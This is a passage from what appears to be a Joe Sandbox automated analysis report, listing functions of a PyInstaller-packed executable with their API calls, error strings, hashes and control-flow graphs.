                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                      • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                      • Instruction ID: 4ee7bc68b35650c2bb8fea699c5c663a21a8bfaf89951a574c550c53d7c74005
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75414D23A0C98385FA20BB24EC455B9A360FF95754FD00676D99D47694EF3CE54A8720
                                                                                                                                                                                                                                      Function 00007FF70AEF92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                      • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                      • Instruction ID: d0f5d35faed1815700424b9a574bae96a05fb0783f9ac5742d461abb14766490
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F04423A1964386F760AB60F849766A350EF84764F940275DDAD027D4DF3CE0498A10
                                                                                                                                                                                                                                      Function 00007FF70AEF1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 329 7ff70aef1950-7ff70aef198b call 7ff70aef45b0 332 7ff70aef1991-7ff70aef19d1 call 7ff70aef7f80 329->332 333 7ff70aef1c4e-7ff70aef1c72 call 7ff70aefc5c0 329->333 338 7ff70aef1c3b-7ff70aef1c3e call 7ff70af000bc 332->338 339 7ff70aef19d7-7ff70aef19e7 call 7ff70af00744 332->339 343 7ff70aef1c43-7ff70aef1c4b 338->343 344 7ff70aef19e9-7ff70aef1a03 call 7ff70af04f78 call 7ff70aef2910 339->344 345 7ff70aef1a08-7ff70aef1a24 call 7ff70af0040c 339->345 343->333 344->338 351 7ff70aef1a45-7ff70aef1a5a call 7ff70af04f98 345->351 352 7ff70aef1a26-7ff70aef1a40 call 7ff70af04f78 call 7ff70aef2910 345->352 358 7ff70aef1a7b-7ff70aef1afc call 7ff70aef1c80 * 2 call 7ff70af00744 351->358 359 7ff70aef1a5c-7ff70aef1a76 call 7ff70af04f78 call 7ff70aef2910 351->359 352->338 371 7ff70aef1b01-7ff70aef1b14 call 7ff70af04fb4 358->371 359->338 374 7ff70aef1b35-7ff70aef1b4e call 7ff70af0040c 371->374 375 7ff70aef1b16-7ff70aef1b30 call 7ff70af04f78 call 7ff70aef2910 371->375 381 7ff70aef1b6f-7ff70aef1b8b call 7ff70af00180 374->381 382 7ff70aef1b50-7ff70aef1b6a call 7ff70af04f78 call 7ff70aef2910 374->382 375->338 388 7ff70aef1b8d-7ff70aef1b99 call 7ff70aef2710 381->388 389 7ff70aef1b9e-7ff70aef1bac 381->389 382->338 388->338 389->338 392 7ff70aef1bb2-7ff70aef1bb9 389->392 395 7ff70aef1bc1-7ff70aef1bc7 392->395 396 7ff70aef1be0-7ff70aef1bef 395->396 397 7ff70aef1bc9-7ff70aef1bd6 395->397 396->396 398 7ff70aef1bf1-7ff70aef1bfa 396->398 397->398 399 7ff70aef1c0f 398->399 400 7ff70aef1bfc-7ff70aef1bff 398->400 401 7ff70aef1c11-7ff70aef1c24 399->401 400->399 402 7ff70aef1c01-7ff70aef1c04 400->402 403 7ff70aef1c26 401->403 404 7ff70aef1c2d-7ff70aef1c39 401->404 402->399 405 7ff70aef1c06-7ff70aef1c09 402->405 403->404 404->338 404->395 405->399 406 7ff70aef1c0b-7ff70aef1c0d 405->406 406->401
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF7F80: _fread_nolock.LIBCMT ref: 00007FF70AEF802A
                                                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF70AEF1A1B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF70AEF1B6A), ref: 00007FF70AEF295E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                      • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                      • Instruction ID: 669f04b8111f3b23354048927e35cb9dc10bb94b5a961e5806075cecc692210b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F817D73A08687C5FB24FB24D8426B9A3A0EF48784FC445B5EA8D87785DF3CE5858760
                                                                                                                                                                                                                                      Function 00007FF70AEF1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 407 7ff70aef1600-7ff70aef1611 408 7ff70aef1613-7ff70aef161c call 7ff70aef1050 407->408 409 7ff70aef1637-7ff70aef1651 call 7ff70aef45b0 407->409 414 7ff70aef162e-7ff70aef1636 408->414 415 7ff70aef161e-7ff70aef1629 call 7ff70aef2710 408->415 416 7ff70aef1653-7ff70aef1681 call 7ff70af04f78 call 7ff70aef2910 409->416 417 7ff70aef1682-7ff70aef169c call 7ff70aef45b0 409->417 415->414 423 7ff70aef169e-7ff70aef16b3 call 7ff70aef2710 417->423 424 7ff70aef16b8-7ff70aef16cf call 7ff70af00744 417->424 431 7ff70aef1821-7ff70aef1824 call 7ff70af000bc 423->431 432 7ff70aef16d1-7ff70aef16f4 call 7ff70af04f78 call 7ff70aef2910 424->432 433 7ff70aef16f9-7ff70aef16fd 424->433 439 7ff70aef1829-7ff70aef183b 431->439 445 7ff70aef1819-7ff70aef181c call 7ff70af000bc 432->445 436 7ff70aef16ff-7ff70aef170b call 7ff70aef1210 433->436 437 7ff70aef1717-7ff70aef1737 call 7ff70af04fb4 433->437 442 7ff70aef1710-7ff70aef1712 436->442 446 7ff70aef1761-7ff70aef176c 437->446 447 7ff70aef1739-7ff70aef175c call 7ff70af04f78 call 7ff70aef2910 437->447 442->445 445->431 451 7ff70aef1802-7ff70aef180a call 7ff70af04fa0 446->451 452 7ff70aef1772-7ff70aef1777 446->452 459 7ff70aef180f-7ff70aef1814 447->459 451->459 454 7ff70aef1780-7ff70aef17a2 call 7ff70af0040c 452->454 462 7ff70aef17a4-7ff70aef17bc call 7ff70af00b4c 454->462 463 7ff70aef17da-7ff70aef17e6 call 7ff70af04f78 454->463 459->445 468 7ff70aef17c5-7ff70aef17d8 call 7ff70af04f78 462->468 469 7ff70aef17be-7ff70aef17c1 462->469 470 7ff70aef17ed-7ff70aef17f8 call 7ff70aef2910 463->470 468->470 469->454 471 7ff70aef17c3 469->471 474 7ff70aef17fd 470->474 471->474 474->451
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                      • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                      • Instruction ID: 109978e0a95fcee77d60de156a030688d1b56c1033f11b4ac0d21c72eb3f1953
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE516763A08687C2FA10BB21EC025A9A3A0EF44B94FC446B5EE0C477D6EF3CF5458760
                                                                                                                                                                                                                                      Function 00007FF70AEF8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF88F4
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF88FA
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF893C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8A20: GetEnvironmentVariableW.KERNEL32(00007FF70AEF388E), ref: 00007FF70AEF8A57
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF70AEF8A79
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF082A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF082C1
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2810: MessageBoxW.USER32 ref: 00007FF70AEF28EA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                      • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                      • Instruction ID: 5ca41a01172a02c53cce1f36a6b2d5dc8b0615e11e3f26f5ca531eb66ac0efeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A417B23A1968345FA24BB65EC562BAD390EF897D0FC041B1EE0D8779ADF3CE5058760
                                                                                                                                                                                                                                      Function 00007FF70AEF1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 599 7ff70aef1210-7ff70aef126d call 7ff70aefbdf0 602 7ff70aef126f-7ff70aef1296 call 7ff70aef2710 599->602 603 7ff70aef1297-7ff70aef12af call 7ff70af04fb4 599->603 608 7ff70aef12d4-7ff70aef12e4 call 7ff70af04fb4 603->608 609 7ff70aef12b1-7ff70aef12cf call 7ff70af04f78 call 7ff70aef2910 603->609 614 7ff70aef12e6-7ff70aef1304 call 7ff70af04f78 call 7ff70aef2910 608->614 615 7ff70aef1309-7ff70aef131b 608->615 620 7ff70aef1439-7ff70aef144e call 7ff70aefbad0 call 7ff70af04fa0 * 2 609->620 614->620 618 7ff70aef1320-7ff70aef1345 call 7ff70af0040c 615->618 628 7ff70aef1431 618->628 629 7ff70aef134b-7ff70aef1355 call 7ff70af00180 618->629 637 7ff70aef1453-7ff70aef146d 620->637 628->620 629->628 635 7ff70aef135b-7ff70aef1367 629->635 636 7ff70aef1370-7ff70aef1398 call 7ff70aefa230 635->636 640 7ff70aef1416-7ff70aef142c call 7ff70aef2710 636->640 641 7ff70aef139a-7ff70aef139d 636->641 640->628 642 7ff70aef1411 641->642 643 7ff70aef139f-7ff70aef13a9 641->643 642->640 645 7ff70aef13d4-7ff70aef13d7 643->645 646 7ff70aef13ab-7ff70aef13b9 call 7ff70af00b4c 643->646 648 7ff70aef13d9-7ff70aef13e7 call 7ff70af19ea0 645->648 649 7ff70aef13ea-7ff70aef13ef 645->649 651 7ff70aef13be-7ff70aef13c1 646->651 648->649 649->636 650 7ff70aef13f5-7ff70aef13f8 649->650 653 7ff70aef140c-7ff70aef140f 650->653 654 7ff70aef13fa-7ff70aef13fd 650->654 655 7ff70aef13c3-7ff70aef13cd call 7ff70af00180 651->655 656 7ff70aef13cf-7ff70aef13d2 651->656 653->628 654->640 658 7ff70aef13ff-7ff70aef1407 654->658 655->649 655->656 656->640 658->618
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                      • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                      • Instruction ID: 05e2bb197f5b083b8943c092de5c543f11f358d40ed9de2f895ee63ca7bb7cdf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D51BD23A0868785FA60BB11EC513BAE291EF85794FC442B5EE4D87BC5EF3CE5058720
                                                                                                                                                                                                                                      Function 00007FF70AF0ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF70AF0F11A,?,?,-00000018,00007FF70AF0ADC3,?,?,?,00007FF70AF0ACBA,?,?,?,00007FF70AF05FAE), ref: 00007FF70AF0EEFC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF70AF0F11A,?,?,-00000018,00007FF70AF0ADC3,?,?,?,00007FF70AF0ACBA,?,?,?,00007FF70AF05FAE), ref: 00007FF70AF0EF08
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                      • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                      • Instruction ID: 43b9e43554950be46b47241bf82b59626c58c008164e4257c3323821dba8799c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41F123B19A1681FA15EB16DC04AB5E392BF48B90FC98979ED1D87394EF3CF4058320
                                                                                                                                                                                                                                      Function 00007FF70AEF36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF70AEF3804), ref: 00007FF70AEF36E1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF3804), ref: 00007FF70AEF36EB
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2C9E
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2D63
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2C50: MessageBoxW.USER32 ref: 00007FF70AEF2D99
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                      • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                      • Instruction ID: 7231f908d9f7499947c38fe57585a1e949a90e0bc55474b3429169d04aadf15a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44215163B1C64381FA20BB24EC563B6A250FF88394FC04172E66D866E6EF2CF505C720
                                                                                                                                                                                                                                      Function 00007FF70AF0BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 744 7ff70af0bacc-7ff70af0baf2 745 7ff70af0bb0d-7ff70af0bb11 744->745 746 7ff70af0baf4-7ff70af0bb08 call 7ff70af04f58 call 7ff70af04f78 744->746 747 7ff70af0bee7-7ff70af0bef3 call 7ff70af04f58 call 7ff70af04f78 745->747 748 7ff70af0bb17-7ff70af0bb1e 745->748 760 7ff70af0befe 746->760 767 7ff70af0bef9 call 7ff70af0a950 747->767 748->747 750 7ff70af0bb24-7ff70af0bb52 748->750 750->747 754 7ff70af0bb58-7ff70af0bb5f 750->754 757 7ff70af0bb78-7ff70af0bb7b 754->757 758 7ff70af0bb61-7ff70af0bb73 call 7ff70af04f58 call 7ff70af04f78 754->758 763 7ff70af0bb81-7ff70af0bb87 757->763 764 7ff70af0bee3-7ff70af0bee5 757->764 758->767 765 7ff70af0bf01-7ff70af0bf18 760->765 763->764 768 7ff70af0bb8d-7ff70af0bb90 763->768 764->765 767->760 768->758 771 7ff70af0bb92-7ff70af0bbb7 768->771 773 7ff70af0bbb9-7ff70af0bbbb 771->773 774 7ff70af0bbea-7ff70af0bbf1 771->774 775 7ff70af0bbbd-7ff70af0bbc4 773->775 776 7ff70af0bbe2-7ff70af0bbe8 773->776 777 7ff70af0bbf3-7ff70af0bc1b call 7ff70af0d66c call 7ff70af0a9b8 * 2 774->777 778 7ff70af0bbc6-7ff70af0bbdd call 7ff70af04f58 call 7ff70af04f78 call 7ff70af0a950 774->778 775->776 775->778 780 7ff70af0bc68-7ff70af0bc7f 776->780 804 7ff70af0bc38-7ff70af0bc63 call 7ff70af0c2f4 777->804 805 7ff70af0bc1d-7ff70af0bc33 call 7ff70af04f78 call 7ff70af04f58 777->805 808 7ff70af0bd70 778->808 783 7ff70af0bcfa-7ff70af0bd04 call 7ff70af1398c 780->783 784 7ff70af0bc81-7ff70af0bc89 780->784 795 7ff70af0bd0a-7ff70af0bd1f 783->795 796 7ff70af0bd8e 783->796 784->783 788 7ff70af0bc8b-7ff70af0bc8d 784->788 788->783 792 7ff70af0bc8f-7ff70af0bca5 788->792 792->783 797 7ff70af0bca7-7ff70af0bcb3 792->797 795->796 802 7ff70af0bd21-7ff70af0bd33 GetConsoleMode 795->802 800 7ff70af0bd93-7ff70af0bdb3 ReadFile 796->800 797->783 803 7ff70af0bcb5-7ff70af0bcb7 797->803 806 7ff70af0bdb9-7ff70af0bdc1 800->806 807 7ff70af0bead-7ff70af0beb6 GetLastError 800->807 802->796 809 7ff70af0bd35-7ff70af0bd3d 802->809 803->783 810 7ff70af0bcb9-7ff70af0bcd1 